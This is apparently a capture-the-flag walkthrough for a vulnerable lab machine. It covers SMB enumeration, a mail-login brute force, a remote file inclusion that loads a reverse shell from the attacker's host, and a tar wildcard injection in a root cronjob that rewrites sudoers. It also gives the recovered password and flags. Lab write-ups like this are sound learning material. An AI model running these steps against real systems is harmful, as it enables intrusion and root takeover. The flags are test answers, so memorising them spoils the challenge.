Deploy and compromise the vulnerable machine!

What is Miles password for his emails?

Run nmap -A -p- IP to check all ports of the machine. You will see that the samba-ports of the target are open. Continue the recon part of the task by running gobuster dir --url http://IP -w /path/to/wordlist.txt -t 64. By checking the returned directories you will find that only the "squirrelmail"-directory is accessible and that we require credentials to login. To find the credentials you can check the samba-ports. Run smbclient -L \\\\IP and enter nothing as password. You will find an anonymous-share. Run smbclient -L \\\\IP\\anonymous and you get access to the share. Check the files in the share and in the log-directory. The "log1.txt"-file contains a list of random words. Going to the squirrelmail-directory on the server we can use this list as a password-list. By doing so we get the password of milesdyson.

cyborg007haloterminator

What is the hidden directory?

Check the mails of milesdyson and you will find a mail containing a reset password. With this information we can log-in to miles smb-share by running smbclient -U milesdyson //IP/milesdyson. After logging in to the share you can search through the share and you will find a single txt-file called "important.txt". In this file we will find the mention of a single directory.

/45kra24zxs28v3yd

What is the vulnerability called when you can include a remote file for malicious purposes?

Remote File Inclusion

What is the user flag?

Go to the newly found directory. From there run gobuster to check for more directories. You will find an "administrator"-login that uses "Cuppa CMS". Search "Cuppa CMS" in exploit-db and you will find an exploit. To use the exploit you can enter "http://IP/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=PARAMETER". Instead of "PARAMETER" we can enter directories or urls. Download a php-reverse-shell. Start the listener on your device. Start a server on your device and enter "http://YOUR_IP:PORT/shell.php" instead of the PARAMETER to start the shell. Once the shell is established run cat /home/milesdyson/user.txt and get the flag.

7ce5c2109a40f958099283600a9ae807

What is the root flag?

Check your sudo privileges by running sudo -l. You will see that there are no privileges for your current user. In the directory of milesdyson you will see that there is a backup-directory. In the directory there is a backup.sh-file. Running cat backup.sh shows that the script compresses the content of the "/var/www/html"-directory into the backup.tgz-file. This seems to be a cronjob. By running cat /etc/crontab we confirm that the script is executed every minute by root. Unfortunately we cannot change the content of the script-file, but by using gtfo-bins you can find out that you can establish a shell by running tar with specific parameters. We can use this vulnerability in combination with the cronjob to gain access to the root-user. To do so change the directory to "/var/www/html". There you can run echo 'echo "www-data ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > sudo.sh, touch "/var/www/html/--checkpoint-action=exec=sh sudo.sh" and touch "/var/www/html/--checkpoint=1". Then run sudo su to become root. Run cat /root/root.txt and get the flag.

3f0372db24753accc7179a282cd6a949